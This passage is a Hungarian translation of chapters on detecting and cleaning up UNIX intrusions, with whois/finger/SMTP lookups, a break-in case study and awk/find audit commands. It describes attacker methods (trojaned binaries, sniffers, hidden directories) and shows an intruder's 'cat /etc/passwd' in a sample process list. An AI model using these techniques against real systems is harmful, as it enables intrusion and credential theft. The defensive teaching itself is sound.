Ha van accountod a távoli gépen,lépj be,és nézd meg,ki futtat rlogin,vagy telnet<br />

parancsot,amelyik a gépedre irányul.Ha találsz ilyet,azonnal lépj kapcsolatba az<br />

adott rendszer adminisztrátorával,és figyelmeztesd a problémával kapcsolatban.<br />

Egyéb figyelmeztõ jelek<br />

Számos egyéb figyelmeztetõ jel létezik,amely egy támadó jelenlétére utalhat a<br />

rendszerünkben.Pl felfedezed,hogy azok a shellek olyan terminálokon<br />

futnak,amelyekre senki sincs belépve vagy olyan nyitott network connection-öket<br />

veszel észre,melyek eredete ismeretlen gépekrõl ered.<br />

Légy gyanakvó és kiváncsiskodó!<br />

Hogyan lépjünk kapcsolatba olyan computerek adminisztrátoraival,amelyeket nem<br />

ismerünk<br />

Gyakran elõfordulhat,hogy nem tudod kideríteni a nevét és telefonszámát egy távoli<br />

gép rendszeradminisztrátorának,mert a UNIX nem biztosít elõírásszerû<br />

felhasználóazonosítási mechanizmust.Jó módszer a telefonszám és email cím<br />

kiderítésére a whois parancs használata,amivel a NIC (Network Information Center)<br />

adatbázisban kerestethetünk.Ha a rendszereden nincs whois parancs,egyszerûen<br />

telnetelj be a NIC site-ra.Alul van egy példa arra,hogyan nyomozzuk ki a nevet és<br />

telefonszámot.<br />

A NIC karabantart egy adatbázist,amely a fontos network felhasználók neveit,címeit<br />

és telefonszámait tartalmazza(álltalában a különbözõ site-ok contact person-jainak<br />

adatait is).Ha connectolni tudsz a whois.internic.net-re telneten<br />

keresztül,megkaphatod az információt,amire szükséged van.Próbáld ki a következõt :<br />

1. Telnetelj a whois.internic.net-re<br />

2. A promptnál írd be : whois<br />

3. Próbáld meg beírni a robot.ocp.com hostot. Ha szerencséd van,a server a<br />

megfelelõ recordot küldi vissza az adatbázisból,amely a contact person adatait<br />

tartalmazza.<br />

4. Ha ez nem jött be,próbálkozz az ocp.com-mal.<br />

5. Ha kész,írd be a quit-et a rendszerbõl való kilépéshez.<br />

A következõ példa azt mutatja be,hogy hogyan kapjunk információt a whitehouse.gov<br />

domainról:<br />

% telnet whois.internic.net<br />

Trying 198.41.0.6 ...<br />

Connected to rs.internic.net.<br />

Escape character is `^]'.<br />

144<br />

SunOS UNIX 4.1 (rs1) (ttyp1)


Hackers’ Guide<br />

***********************************************************************<br />

* -- InterNIC Registration Services Center --<br />

*<br />

* For wais, type: WAIS <br />

* For the *original* whois type: WHOIS [search string] <br />

* For referral whois type: RWHOIS [search string] <br />

*<br />

* For user assistance call (703) 742-4777<br />

# Questions/Updates on the whois database to HOSTMASTER@internic.net<br />

* Please report system problems to ACTION@internic.net<br />

***********************************************************************<br />

Please be advised that use constitutes consent to monitoring<br />

(Elec Comm Priv Act, 18 USC 2701-2711)<br />

Cmdinter Ver 1.3 Tue Oct 17 21:51:53 1995 EST<br />

[xterm] InterNIC > whois<br />

Connecting to the rs Database . . . . . .<br />

Connected to the rs Database<br />

Whois: whitehouse.gov<br />

Executive Office of the President USA (WHITEHOUSE-HST)<br />

WHITEHOUSE.GOV<br />

198.137.240.100<br />

Whitehouse Public Access (WHITEHOUSE-DOM)<br />

WHITEHOUSE.GOV<br />

Whois: whitehouse-dom<br />

Whitehouse Public Access (WHITEHOUSE-DOM)<br />

Executive Office of the President USA<br />

Office of Administration<br />

Room NEOB 4208<br />

725 17th Street NW<br />

Washington, D.C. 20503<br />

Domain Name: WHITEHOUSE.GOV<br />

Administrative Contact:<br />

Fox, Jack S. (JSF) fox_j@EOP.GOV<br />

(202) 395-7323<br />

Technical Contact, Zone Contact:<br />

Ranum, Marcus J. (MJR) mjr@BSDI.COM<br />

(410) 889-6449<br />

Record last updated on 17-Oct-94.<br />

Record created on 17-Oct-94.<br />

Domain servers in listed order:<br />

GATEKEEPER.EOP.GOV 198.137.241.3<br />

ICM1.ICP.NET 192.94.207.66<br />

145


Hackers’ Guide<br />

Whois: quit<br />

[xterm] InterNIC > quit<br />

Tue Oct 17 21:55:30 1995 EST<br />

Connection closed by foreign host.<br />

%<br />

Ha esetleg ez a módszer nem sikerülne,meg kel próbálni a host ISP-jét felhívni,hátha<br />

tudnak contact onformációt mondani.Az ISP-t könnyen kideríthetjük a traceroute<br />

paranccsal.Vészhelyzetben a szervezet számát hívjuk(amihez a site tartozik),és<br />

kérjük meg a biztonsági õrt,hogy lépjen kapcsolatba a megfelelõ személyekkel.<br />

Megpróbálhatjuk esetleg még a finger parancsot alkalmazni a távoli gép rootjára :<br />

% finger root@robot.ocp.com<br />

[robot.ocp.com]<br />

Login name: root in real life: Joel Wentworth<br />

Directory: / Shell: /bin/csh<br />

Last login Sat April 14, 1990 on /dev/tty<br />

Plan:<br />

For information regarding this computer, please contact<br />

Joel Wentworth at 301-555-1212<br />

Sajnos elég gyakran használhatatlan információt ad vissza :<br />

% finger root@robot.ocp.com<br />

[robot.ocp.com]<br />

Login name: root in real life: Operator<br />

Directory: / Shell: /bin/csh<br />

Last login Mon Dec. 3, 1990 on /dev/console<br />

No plan<br />

Ebben az esetben meg kell próbálnod kinyomozni,hogy ki a computer<br />

adminisztrátora,úgy,hogy kapcsolatba lépünk a site sendmail démonjával,és<br />

megpróbáljuk azonosítani,hogy ki kap leveleket a root vagy postmaster mailboxokba.<br />

% telnet robot.ocp.com smtp<br />

Trying...<br />

Connected to robot.ocp.com<br />

Escape character is "^]".<br />

220 robot.ocp.com Sendmail NeXT-1.0 (From Sendmail 5.52)/NeXT-1.0 ready at<br />

Sun, 2 Dec 90 14:34:08 EST<br />

helo mymachine.my.domain.com<br />

250 robot.ocp.com Hello mymachine.my.domain.com, pleased to meet you<br />

vrfy postmaster<br />

250 Joel Wentworth <br />

expn root<br />

250 Joel Wentworth <br />

quit<br />

221 robot.ocp.com closing connection<br />

Connection closed by foreign host.<br />

146


Ezekután használhatod finger parancsot,hogy kiderítsd a telefonszámot.<br />

Hackers’ Guide<br />

Sajnos sok rendszeradminisztrátor kikapcsolja a finger démont,és a sendmail démon<br />

nem teljesíti a kérésünket(verify,expand).Ugyanakkor még mindig van esély a<br />

contact person azonosítására.<br />

Ha minden próbálkozásunk sikertelen,küldhetünk mailt a "postmaster" -nek az adoot<br />

gépre,és reménykedhetünk,hogy hamarosan elolvassák....Soha ne említsd meg a<br />

betörést az emailben,mert néha a betolakodó monitorozza az emaileket.Ehelyett add<br />

meg a nevedet,telefonszámodat,jelezd,hogy a dolog nagyon fontos,és kérd a<br />

postmastert,hogy hívjon fel.Természetesen,miután felhívtak,azonnal tudd meg a<br />

számot,és próbáld meg visszahívni õket - csak hogy biztos legyél benne,hogy az<br />

adminisztrátorral beszélsz(és nem a támadóval,aki törölte a levelünket,mielõtt azt<br />

bárki elolvashatta volna).Felveheted a kapcsolatot a FIRST team-ek egyikével<br />

is,úgymint a CERT-CC-vel.Nekik van néhány egyéb erõforrásuk,és talán õk el tudnak<br />

látni a kellõ contact infokkal.<br />

Hogyan szabaduljunk meg a behatolótól?<br />

A számítógép kikapcsolása a leggyorsabb mód arra,hogy a támadót kirugdaljuk a<br />

géprõl. :) Szerencsétlenségünkre ez a drasztikus akció nem csak a támadót rugdalja<br />

ki a géprõl,hanem félbeszakítja a gépünkben folyó összes folyamatot,beleértve a<br />

felhasználók munkáit is.Ezzel a bizonyítékot is könnyen eltüntethetjük,amelyre<br />

néhány nap múlva a bíróságon nagy szükségünk lehet(pl : futó<br />

processek(mailrace,stb)),valamint ez okozhatja a rendszer sérülését is amikor<br />

rebootolsz (a trojan startup-scriptek miatt).A UNIX filerendszere nincs<br />

megbarátkozva a hirtelen áramellátás megszûnéssel : a tápcsatlakozó kihúzása jóval<br />

nagyobb károkat okozhat,mint amilyet a behatoló valaha is tehet.<br />

Néhány esetben sikerülhet a támadótól való megszabadulás úgy is,ha egyszerûen<br />

megkérjük,hogy hagyja el a rendszerünket.Informáld a támadót,hogy amit csinál az<br />

antiszociális és törvényellenes.Néhány számítógépes betörõnek gyerekes motivációi<br />

vannak a magántulajdon megsértésére;gyakran nem állnak le gondolkodni a<br />

következménykerõl.Ugyanakkor ne fogadj rá,hogy a behatoló primitív azért,mert így<br />

viselkedik.<br />

Ha az illetõ nem hajlandó elhagyni rendszerünket,ki kell gyilkolni az álltala futtatott<br />

processeket a kill parancsot használva. Használd a ps parancsot,hogy megkapd az<br />

összes user processeinek process-számát,változtasd meg a hackelt acc. jelszavát,és<br />

végül irtsd ki a támadó összes processét.<br />

Egy egyszerû példa:<br />

# ps -aux<br />

USER PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND<br />

root 1434 20.1 1.4 968K 224K 01 R 0:00 ps aux<br />

nasty 147 1.1 1.9 1.02M 304K p3 S 0:07 - (csh)<br />

nasty 321 10.0 8.7 104K 104K p3 S 0:09 cat /etc/passwd<br />

nasty 339 8.0 3.7 2.05M 456K p3 S 0:09 rogue<br />

...<br />

# passwd nasty<br />

Changing password for nasty.<br />

147


Hackers’ Guide<br />

New password: rogue32<br />

Retype new password: rogue32<br />

# kill -9 147 321 339<br />

Légy megfontolt a password változtatásnál,mielõtt kinyírod a processeket -<br />

különösen ha a behatoló rootként van belépve.Ha a felhasználó gyorsabban<br />

gépel,mint te,könnyen elõfordulhat hogy letiltja az accodat,mielõtt tudnál róla. :)<br />

Tartsd észben,hogy a legtöbb betolakodó installálni fog egy backdoort a<br />

rendszerbe.Szóval attól,hogy megváltoztattad a jelszót,még nem biztos,hogy<br />

biztonságban vagy : kapcsold a rendszert single-user módba,és ellenõrizd le<br />

többször is.<br />

Ha már minden kötél szakad,fizikailag is megszakíthatod a kapcsolatot.Ha a<br />

behatoló telefonvonalon tárcsázott be,kikapcsolhatod a modemet - vagy kihúzhatod a<br />

számítógép hátuljából. Ha a behatoló networkön keresztül jött be,kihúzhatod a<br />

hálózati csatlakozót - ugyanakkor ez minden legitim felhasználó kiszolgálását<br />

megszakítja.. Amint a támadó eltûnt a gépünkrõl,próbáld meg eldönteni a kár<br />

volumenét,és foltozd be a sechole-okat,amik a behatolót beengedték.Ugyanakkor<br />

alaposan nézzünk szét,mert könnyen lehet,hogy új sechole-okat nyitott meg,amin<br />

késõbb visszajöhet.<br />

Egy betörés anatómiája<br />

A következõ történet megtörtént esetet dolgoz fel.A nevek és egy pár részlet meg lett<br />

változtatva a személyiségi jogok védelme érdekében. :))<br />

Késõ este 1995 Novemberében egy computer konzultáns egy Seattle-i cégnél<br />

belépett az egyik gépbe,amelyet alkalmanként használni szokott.A rendszer<br />

szokatlanul lassúnak tûnt,így lefuttatta a top parancsot,hogy megtudja,mi az,ami<br />

ennyire lelassítja a rendszert.A konzultáns észrevette,hogy egy vs nevû program<br />

óriási rendszer-erõforrásokat emészt fel.A program superuserként futott...<br />

Valami nem stimmelt...Hogy több információt kapjon,lefuttatta a ps parancsot.Ekkor<br />

egyre furcsábbak lettek a dolgok - a misztikus program nem jelent meg a ps álltal<br />

visszaadott listában.Mégegyszer megpróbálta a top parancsot futtatni,és lám a vs<br />

process még mindig futott...<br />

Ekkor villant be a tudatába,hogy ezek egy betörés nyomai lehetnek...Elkezdett hát a<br />

filerendszerben körbenézni az Emacs dired parancsát használva,és megtalálta a vs<br />

programot a /var/.e könyvtárban.Semmi kétség,a program pontosan itt volt,és még<br />

mindig látható volt Emacsból a dired paranccsal.<br />

Ekkor már biztos volt benne,hogy valaki betört a rendszerbe.A támadás elég<br />

kifinomúltnak tünt.Természetesen nem akarta,hogy a támadó tovább<br />

tevékenykedhessen,ezért szerette volna shutdownolni a rendszert.De aggódott<br />

amiatt,hogy a támadó booby-trappolta(??) a /etc/halt parancsot,hogy megsemmisítse<br />

a betörés nyomait. Ezért mielõtt lelõtte volna a rendszert,használta a tar<br />

parancsot,hogy másolatot készítsen a /var/.e könyvtárról éppúgy,mint a /bin és /etc<br />

könyvtárakról.Amint a .tar file elkészült,átmásolta azt egy másik computerre,majd<br />

megállította a rendszert.<br />

Másnap reggel a következõ megfigyeléseket tette a .tar fileban:<br />

148


- Valaki betört a rendszerbe<br />

Hackers’ Guide<br />

- A /bin/login program módosítva lett,így bárki be tud lépni rootként az Internetrõl,egy<br />

spéci password birtokában.<br />

- A /var/.e/vs program amit a támadó futtatott,egy sniffer volt,ami passwordokre<br />

vadászott.Ez az elfogott passwordoket egy másik gépre küldte át az interneten<br />

keresztül<br />

- A /bin/ls és /bin/ps programok stzintén módosítva lettek,így azok nem jelenítették<br />

meg a /var/.e directoryt<br />

- Az inode kreációs dátum és a módosítási idõk a /bin/ls,/bin/ps és /bin/login file-okon<br />

vissza lettek állítva az eredeti értékekre(a módosítás elõttire).A módosított file-ok<br />

chechksumja pedig megegyeztek az eredetivel.De a file-ok összehasonlítása a<br />

bckupban tároltakkal megmutatja,hogy változtatás történt rajtuk.<br />

Este 10:00 volt,amikor a betörést felfedezte.Ennek ellenére felhívta telefonon a<br />

system managert az otthonában.Ekkor rá kellet jönnie....<br />

- A system manager tudott a betörésrõl 3 napja,de semmit sem tett az ügy<br />

érdekében.Az ok az volt,hogy félt,hogy a behatoló sok biztonsági rést csinált<br />

rendszerének védelmében,és ha felidegesíti õt,az illetõ bosszút állhat és letörölhet<br />

fontos file-okat,vagy teljesen lelõheti a rendszert. :))<br />

[Ez aztán a system manager,mi? :)]<br />

Ez egy nagyon hülye lépés volt.Hagyni a támadót,hogy a rendszeren maradva minél<br />

több passwordot gyüjthessen....Bahhh! A késleltetéssel hagyjuk,hogy az idõ a<br />

támadónak dolgozzon,és egyre nagyobb módosításokat eszközöljön a rendszeren.<br />

Mit tehetett volna a manager,amint felfedezi a betörést? Nos...nagyjából az,amit a<br />

konzultáns barátunk tett...Csinálni egy archive-ot a rendszerrõl szalagra,vagy egy<br />

másik diskre,izolálni a rendszert,és csak ezután nyomozni.Ha a rendszer boobytrappolva<br />

lett,és egy áramellátás-hiba keletkezik,abszolút mindent elveszthetnek.<br />

A fenti eset egy tipikus példa az 1994-1995-ben történt betörésekre.A támadonak<br />

elérése van sok eszközhöz,amikkel a betörést végre lehet hajtani(password<br />

snifferek,fake system commandok,amelyek elrejtik jelenlétét).Ezen eszközök<br />

használóinak nagy része azt sem tudja hogyan mûködnek.Sok történetet<br />

hallani,hogy egy lamernek sikerül betörni egy gépbe egy ilyen eszközzel,aztán a<br />

UNIX-os rendszeren DOS-parancsokat akarnak kiadni...Röhejes!<br />

Eredeti mû : Practical UNIX & Internet Security<br />

Fordította : Th3NmY<br />

************************************************************************************************<br />

149


Hackers’ Guide<br />

Betörések felfedezése és kezelése III.<br />

A Log Fileok : A behatoló álltal hagyott nyomok felfedése<br />

Ha nem sikerül a behatolót elkapnod aktivítás közben,még mindig jó esélyed van a<br />

nyomok megtalálására a system logokon keresztül. Elékezz! Keress szokatlan,furcsa<br />

tevékenységeket.pl :<br />

- Userek furcsa idõpontban belépve<br />

- Megmagyarázhatatlan rebootok.<br />

- Megmagyarázhatatlan változtatások a system clock-on.<br />

- Szokatlan hibaüzenetek a mailertõl,ftpd-tõl,vagy más network servertõl.<br />

- Hibás belépési próbálkozások rossz jelszavakkal<br />

- A su parancs jogosulatlan vagy gyanús használata<br />

- Felhasználók,amelyek ismeretlen siteokról vannak loginolva a hálózaton.<br />

Másfelõl nézve azonban ha a behatoló elég ügyes és eléri a superuseri<br />

jogosultságokat,eltûntetheti az invázió összes bizonyítékát.Egyszerûen azért,mert ha<br />

a rendszered logjában nincs record a támadás nyomairól,nem fogsz tudni<br />

rájönni,hogy a rendszered támadás alatt áll.<br />

Sok támadó kis trükköket használ : ahelyett,hogy óvatosan kiszedegetné a rá utaló<br />

recordokat a logokból,egyszerûen törli,vagy meghamisítja az egész filet.Ez azt<br />

jelenti,hogy ha felfedezed,hogy egy logfile törölve van,vagy hamis információt<br />

tartalmaz,fennáll a lehetõség,hogy betörtek a rendszerünkre.De nem biztos,hogy egy<br />

betörés a felelõs a furcsaságokért.Hiányzó,vagy hamis logok azt is jelenthetik,hogy a<br />

system adminisztrátorok egyike óvatlan volt;lehetnek olyan programok a<br />

rendszeren,amelyek törlik a logokat rendszeres idõközönként.<br />

Arról is felismerhetünk egy támadást,ha jogosulatlan változtatásokat találunk<br />

rendszerprogramokban,vagy egy user file-jaiban.Ez egy másik jó ok,hogy olyan<br />

programokat használj,mint a Tripwire a fileokban történõ változások monitorozására.<br />

Ha a system logok egy hardcopy terminal-ra,vagy másik gépre vannak<br />

irányítva,biztosan szeretnéd elõször ezeket megvizsgálni,mert tudod,hogy ezeket<br />

nem tudta a támadó módosítani,aki telefonvonalon,vagy networkon keresztül loginolt.<br />

Eredeti mû : Practical UNIX & Internet Security<br />

Fordította : Th3NmY<br />

************************************************************************************************<br />

150


Betörések felfedezése és kezelése IV.<br />

A behatoló utáni takarítás<br />

Hackers’ Guide<br />

Ha a támadónak sikerült megszereznie a superuseri jogokat,vagy elérést más<br />

privilegizált accountokhoz úgymint uucp,módosíthatja a rendszert,hogy könnyû<br />

legyen újra visszajönnie a jövõben.Részletesebben,a támadó :<br />

- Készíthet egy új accountot<br />

- Megváltoztatja a jelszót egy létezõ accounthoz<br />

- Megváltoztatja a védelmeket egyes file-okon vagy device-okon<br />

- SUID vagy SGID programokat csinálhat<br />

- Kicserélheti,vagy letörölheti a system parancsokat<br />

- Installál egy spéci aliast a mail rendszerben hogy egy programot futtasson<br />

- Új arculatot ad a news vagy UUCP rendszerhez<br />

- Installál egy password sniffert<br />

- Ellopja a password file-t a késõbbi crack-hez<br />

Ha a behatoló az urolsó két bûntettet elkövette,valószínüleg már van elérése egy<br />

legitim accounthoz,bármikor visszatérhet a rendszerbe.Meg kell változtatnod az<br />

összes passwordot a rendszeren.<br />

Egy sikeres betörés után,egy nagyon körültekintõ auditot kell végrehajtanod,hogy<br />

felmérd az okozott kár volumenét.A betörés természetétõl függõen,meg kell<br />

vizsgálnod az egész rendszert.Ugyanígy meg kell vizsgálnod más gépeket is a local<br />

networkodon,vagy talán az egész networkot(beleértve a routereket,és más hálózati<br />

eszközöket).<br />

Megjegyezném,hogy a COPS és a Tiger nagy segítséget nyújtanak a helyreállítási<br />

munkálatokban mivel automatikusan leellenõrzik azokat a dolgokat amiket ebben a<br />

fejezetben tárgyalunk majd.Emlékezz,lehet,hogy ezek is kompromittálva lettek,ezért<br />

szerezz egy új másolatot,és arról dolgozz.A COPS és a Tiger feltételezi a systemexecutable<br />

-ek integrítását,úgymint ls és find.Mi úgy gondoljuk ,ezek az eszközök<br />

jobban használhatók adott esetekben integritás checkerekkel,mint a Tripwire.<br />

A fejezet hátralévõ része részletesen tárgyalja,hogyan találjuk meg,hogy egy támadó<br />

mit csinálhatott,és hogyan fogod mindezt rendbehozni.<br />

Új accountok<br />

Egy behatolás után,scanneld a /etc/passwd file-t,nézd meg,vannak-e benne új<br />

accok.Ha csináltál másolatot errõl a fileról,használd a diff parancsot,hogy a két file-t<br />

összehasonlítsd.De ne tévesszen meg,ha semmilyen különbséget nem<br />

151


Hackers’ Guide<br />

találsz...vizuáld le saját magad is,mert lehet,hogy a támadó módosította a diff<br />

programot...ha így sem találtál semmit,az sem jelent semmit....lehet,hogy a betörõ a<br />

másolatot is módosította. (Ez egy jó ok arra,hogy mindig tartsunk egy külön floppyn<br />

másolatot a /etc/passwd file-ról)<br />

Törölj minden accot,amit a betörõ hozott létre.Jó ha leírod papírra az acc-recordot<br />

mielõtt letörölnéd,abban az esetben ha szeretnéd beperelni a támadót.<br />

Légy biztos benne,hogy a /etc/passwd minden sorát leellenõrizted a megfelelõ<br />

formátumban,és nem volt UID vagy password mezõ,ami jogosulatlan értékekre lett<br />

megváltoztatva.Emlékezz,hogy egy extra kettõspont (:) hozzáadása a /etc/passwd<br />

root bejegyzéshez ugyanazt a kárt okozza,mintha a superuser egész passwordját<br />

törölnék!<br />

A következõ awk parancs kiírja azokat a /etc/passwd bejegyzéseket,amelyeknek<br />

nincs meg a hét mezõjük,amely a superusert specifikálja,vagy nincs passwordjuk.<br />

# cat-passwd | awk -F: 'NF != 7 || $3 == 0 || $2 == "" { print $1 " " $2 " " $3}'<br />

root xq7Xm0Tv 0<br />

johnson f3V6Wv/u 0<br />

sidney 104<br />

#<br />

Ez az awk parancs beállítja a mezõ szeparátort kettõspontra (:), amelyik megegyezik<br />

a /etc/passwd formátumával.Az awk parancs ekkor kiírja az elsõ 3 mezõt(username,<br />

password, és UID) minden sorból,aminek nincs meg a 7 mezõje,vagy 0 az UID,or<br />

nincs passwordje.<br />

Ebben a példában a Johnson usernek 0-ra lett változtatva volt a UID-je,ezzel az<br />

accountja superuseri alias lett,és a Sidney nevû usernek a passwordja el lett<br />

távolítva.<br />

Ez az automatizált checkelés sokkal megbízhatóbb,mint a vizuális<br />

szemrevételezés,de bizonyosodj meg róla,hogy az a script,amit a checkeléshez<br />

használsz,nem lett-e módosítva a betörõ álltal.A legbiztosabb,ha az awk parancsot<br />

minden esetben begépeljük,és nem egy scriptben helyezzük el....vagy használd a<br />

Tripwire-t.<br />

A fileok tartalmának változása<br />

Egy behatoló,aki megszerezte a superuseri jogokat,bármilyen file-t megváltoztathat a<br />

rendszeren.Csinálhatsz egy átfogó leltárat a rendszer filerendszerérõl,vagy<br />

specifikusan kereshetsz bármilyen változtatást.Például egy intruder elhelyezhetett<br />

egy trap-doort,vagy logical bomb-ot,hogy azok késõbb károkat tudjanak okozni.<br />

Az egyik módszer,hogy könnyen észrevegyük a system programokban történt<br />

változtatásokat,hogy checklistákat használunk.<br />

Változtatások a file vagy directory védelmekben<br />

Egy betörés után meg kell vizsgálnunk a védelmét minden kritikus file-nak a<br />

rendszeren.Azok a behatolók,akik superuseri privilégiumokat szereztek<br />

megváltoztathatják a kritikus file-ok védelmét,könnyebbé téve ezzel a superuseri<br />

jogok újbóli megszerzését.Például ha egy intruder a /bin könyvtár mode-ját 777-re<br />

152


Hackers’ Guide<br />

változtatta meg,a jövõben könnyebb lesz módosítania a rendszert; vagy a /dev/kmem<br />

mode-ját átírva megteheti,hogy módosítja a system call-okat közvetlenül egy<br />

symbolic debuggert használva.<br />

Új SUID és SGID fileok<br />

Computer crackerek ,akik superuser jogokra tettek szert,gyakran készítenek SUID és<br />

SGID file-okat.Egy betörés után scanneld a rendszeredet,hogy megbizonyosodj<br />

afelõl, hogy nem keletkeztek új SUID file-ok.<br />

Változások a .rhosts fileban<br />

Egy támadó új .rhosts file-t gyárthatott a userek home directoryjában,vagy<br />

módosíthatta a már meglévõket. (A .rhosts file megengedi a többi usernek a<br />

hálón,hogy logineljenek az accountodra anélkül,hogy passwordot kérne).Egy betörés<br />

után mondd meg a usereknek, hogy checkeljék a .rhost file-jaikat,hogy<br />

megbizonyosodj arról,hogy egyikük sem lett módosítva.<br />

Változások a /etc/hosts.equiv fileban<br />

Egy betolakodó hozzáadhat extra hostokat a /etc/hosts.equiv filehoz,szóval<br />

bizonyosodj meg róla,hogy nem történtek változtatások benne.Ugyanakkor checkeld<br />

a /etc/netgroups file-t is,ha NIS-t vagy NFS-t futtatsz.<br />

Változások a startup fileokban<br />

Egy támadó módosíthatja a tartalmát a pont-tal (.) kezdõdõ fileoknak a userek home<br />

directoryjában.Utasítsd az összes usert,hogy ellenõrizzék ezeket a fileokat,és<br />

jellezzek minden változást.Azt is mondhatod még nekik,hogy úgy checkoljanak,hogy<br />

elõször nevezzék át õket login.old,cshrc.old illetve profile.old-ra. Vedd komolyan<br />

azoknak a fileoknak a verziószám-ellenõrzését,amelyeknek az ownere root,és<br />

ugyanígy checkeld a /etc/profile filet.<br />

Ha sendmailt használsz, a támadó kreálhatott vagy módosíthatta a .forward filet,így<br />

tudnak programokat futtatni,amikor egy mail érkezik.Ez a külsõség különösen kritikus<br />

a nonuser accountoknál,pl ftp vagy uucp.<br />

Ha tudod a támadó belépésének pontos idõpontját,ki tudod listázni az összes .-tal<br />

kezdõdõ filet a userek home directoryjában,rendezheted õket az utolsó változtatások<br />

idõpontja szerint,és ellenõrizheted õket,hogy lettek-e módosítva. Egy egyszerû shell<br />

script erre :<br />

#!/bin/ksh<br />

# Search for .files in home directories<br />

for user in $(cat-passwd | /bin/awk -F: "length($6) > 0 {print $6}")<br />

do<br />

for name in $user/.*<br />

do<br />

[[ $name == $user/.. ]] && continue<br />

[[ -f $name ]] && print "$name"<br />

done<br />

done | xargs ls -ltd<br />

153


Hackers’ Guide<br />

Ugyanakkor a timestampek vizsgálata nem detektál minden módosítást,ahogy azt<br />

majd a fejezet végére létni fogjuk.A -c és -l opciók az ls parancshoz használhatók<br />

arra,hogy az esetleges permission beállításokban történt változásokat is checkolni<br />

tudjuk,és meg tudjuk határozni,hogy az mtime-ot megváltoztatták-e,hogy elrejtsék a<br />

módosítást.<br />

Egy másik megközelítés,hogy az egész filerendszert átnézzük a find paranccsal és<br />

észleljük,milyen fileok és könyvtárak lettek elérve a betörés ideje környékén. Ez talán<br />

kiindulópontot jelenthet ahhoz,hogy mi is történhetett. Abban az esetben,ha a<br />

compilered,loadered, vagy libraryd mindegyike elérést mutat közel ugyanabban az<br />

idõpontban,levonhatod a konklúziót,hogy a betolakodó valamit fordított.<br />

Ha úgy döntessz,hogy így közelíted meg a dolgot, azt tanácsoljuk,hogy elõször<br />

mountold újra az egész filerendszert,mint read-only,így a vizsgálódásaid nem<br />

változtatják meg a mentett filerendszer dátumait és idejét.<br />

Rejtett file-ok és direcoryk<br />

A támadó csinálhatott egy vagy több rejtett directoryt a rendszeren,és használhatta<br />

ezt arra,hogy ide rejtse el az ellopott információt vagy az olyan programokat,amelyek<br />

megtörik a védelmet.<br />

Régebbi UNIX rendszereken, egy álltalános trükk volt a directory elrejtésére,hogy<br />

unlinkelték (rootként) a ".." directoryt egy alkönyvtárban, majd egy újat hoztak létre. A<br />

find parancs figyelmét az így elrejtett directoryk elkerülték,így ott nem tudott speciális<br />

file-ok után kutatni. A UNIXok modern verziói már detektálni tudják a hidden<br />

directorykat,amikor a /etc/fsck programot futtatjuk. Ezért mindig futtasd az fsck-t az<br />

összes filerendszeren a betörés után.<br />

Néhány HP-UX rendszeren a betolakodók az eszközeiket és file-jaikat egy<br />

CDF(Context Dependent File) directoryban tárolták. Ezeken a rendszereken a find és<br />

ls parancsoknál mindig használd a -h opciót,amikor a speciális file-okat keresed.<br />

Napjainkban,a betolakodók gyakran rejtik a filejaikat olyan directorykba,amelyeknek<br />

nevét nehéz felfedezni,vagy nehéz a command line-ba írni. Így egy kezdõ<br />

adminisztrátornak, aki felfedez egy rejtett directoryt, nyilvánvalóan nehezére esik<br />

majd a könyvtár tartalmához való hozzáférés. Az olyen filenevek, amelyeket nehéz<br />

felfedezni vagy megnyitni,álltalában tartalmazzák a ".. " (dot dot space)<br />

karaktersorozatot, kontroll karaketereket,backspace-eket,vagy más speciális<br />

karaktereket.<br />

Gyakran felfedezhetsz hidden diractorykat könnyen, mert ezek olyan eredményeket<br />

adnak vissza,amelyek különböznek a normál könyvtáraktól.<br />

Például :<br />

prose% ls -l<br />

drwxr-xr-x 1 orpheus 1024 Jul 17 11:55 foobar<br />

prose% cd foobar<br />

foobar: No such file or directory<br />

prose%<br />

Ebben az esetben a könyvtár valódi neve foobar , az r betût pedig egy space<br />

követi.A könnyû út az ilyen és ehhez hasonló nevek megnyitásához,hogy használjuk<br />

154


a shell wildcard karaktereit. Pl a *ob* csak a foobar könyvtárral fog egyezni,és<br />

teljesen mindegy,hogy hány space,illetve egyéb dolog volt a végén.<br />

% ls -l<br />

total 1<br />

-rw-r--r-- 1 john 21 Mar 10 23:38 bogus?file<br />

% echo * | cat -v<br />

bogus^Yfile<br />

%<br />

Hackers’ Guide<br />

Ebben a példában a bogus?file egy CTRL+Y karaktert tartalmaz.Az ls parancs<br />

néhány verziója a controll karaktereket kérdõjelekként(?) írja ki. Ahhoz,hogy<br />

megtudjuk,mi volt a kontroll karakter,a nyers filenevet kell a cat parancsnak<br />

küldened.<br />

Ha a Korn shell 93-as verzióját használod,akkor kilistáztathatod egy adott local<br />

directory filejait egy olvashatóbb formában.Ez a megközelítés használható abban az<br />

esetben,ha az ls parancsodat kompromittálta a támadó :<br />

$ printf $'entry: %'' .* *<br />

entry: .<br />

entry: ..<br />

entry: $'..\n'<br />

entry: $'bogus\031file'<br />

entry: temp0001 entry: temp0002 $<br />

Tulajdonos nélküli file-ok<br />

Néha a támadók olyan file-okat hagynak a filerendszerben,amelyeknek nincs<br />

ownerja,illetve groupja.Ez azért van,mert a file-hoz tartozó UID, illetve GID érték nem<br />

felel meg egyetlen bejegyzésnek sem a /etc/passwd illetve a /etc/group fileban. Ez<br />

olyankor fordulhat elõ,ha a támadó csinált egy accountot és néhány file-t,majd törölte<br />

az accot - és ott hagyta a file-okat.<br />

Vagy esetleg a támadó módosította a raw inode-okat egy lemezenmés<br />

megváltoztatta az UID-et.<br />

Ezekre a file-okra rákereshetsz a find paranccsal, ahogy a következõ példa is<br />

mutatja :<br />

# find / -nouser -o -nogroup -print<br />

Emlékezz,ha NFS-t használsz, futtathatod a következõ find parancsot az összes<br />

serverre :<br />

# find / \( -local -o -prune \) -nouser -o -nogroup -print<br />

Akkor is lehetnek owner nélküli fileok a rendszeren,ha egy accot töröltél,de a hozzá<br />

tartozó file-okat nem.Egy jó ötlet,hogy idõnként scanneljünk az ilyen file-ok után,ha<br />

találunk,mentsük õket szalagra,hátha késõbb még szükségünk lesz rá.<br />

Eredeti mû : Practical UNIX & Internet Security<br />

Fordította : Th3NmY<br />

155


Hackers’ Guide<br />

************************************************************************************************<br />

Betörések felfedezése és kezelése V.<br />

Egy példa<br />

Tegyük fel,hogy te egy system administrator vagy egy rendszeren és John Q.<br />

Random ott van veled az irodában. Hirtelen egy figyelmeztetõ ablak nyílik a<br />

képernyõn,amelyet egy Swatch rule syslog kimenet-monitorozó progi nyitott.A syslog<br />

